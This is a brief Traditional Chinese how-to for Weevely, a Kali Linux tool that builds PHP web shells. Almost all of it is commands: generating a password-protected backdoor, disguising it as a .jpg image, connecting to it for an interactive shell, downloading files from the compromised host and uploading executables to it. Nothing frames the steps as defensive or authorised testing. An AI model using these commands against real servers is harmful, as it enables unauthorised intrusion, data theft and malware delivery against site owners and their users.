工具介紹-Weevely (kali linux web shell產生工具)
目錄
Weevely是使用python寫成的webshell管理工具,可產生php webshell。
產生Webshell
使用以下指令產生webshell,要注意密碼用特殊字元有時會造成連線失敗。
如果要產生圖片檔,以jpg命名結尾就可以了。
weevely generate 567 hello.php
連線Webshell
上傳後使用以下指令連線後門,然後進入一個互動式的shell
weevely http://urltowebshell/hello.php 567
如果是使用jpg的檔案,一樣直接連線該檔案就行。
利用Webshell下載檔案
從遠端下載檔案,rpath是遠端路行 lpath是要存的本地路徑(都要包含檔名)
file.download rpath lpath [-vector]
利用Webshell上傳檔案
使用:file_upload2web
指令可以檔案上傳到目標主機
:file_upload2web lpath rpath
:file\_upload2web /home/kali/Desktop/test.exe test.exe